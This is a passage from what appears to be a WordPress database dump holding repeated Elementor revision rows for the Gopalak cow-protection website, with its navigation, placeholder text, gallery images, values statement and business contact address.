			</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-12 12:47:07','2022-10-12 07:17:07','',1373,'https://gopalak.in/?p=1662',0,'revision','',0),(1663,1,'2022-10-12 12:47:07','2022-10-12 07:17:07','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-12 12:47:07','2022-10-12 07:17:07','',1373,'https://gopalak.in/?p=1663',0,'revision','',0),(1664,1,'2022-10-12 12:47:07','2022-10-12 07:17:07','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-12 12:47:07','2022-10-12 07:17:07','',1373,'https://gopalak.in/?p=1664',0,'revision','',0),(1665,1,'2022-10-12 12:47:26','2022-10-12 07:17:26','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-12 12:47:26','2022-10-12 07:17:26','',1373,'https://gopalak.in/?p=1665',0,'revision','',0),(1666,1,'2022-10-12 12:47:27','2022-10-12 07:17:27','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"50\" height=\"53\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 50px) 100vw, 50px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right 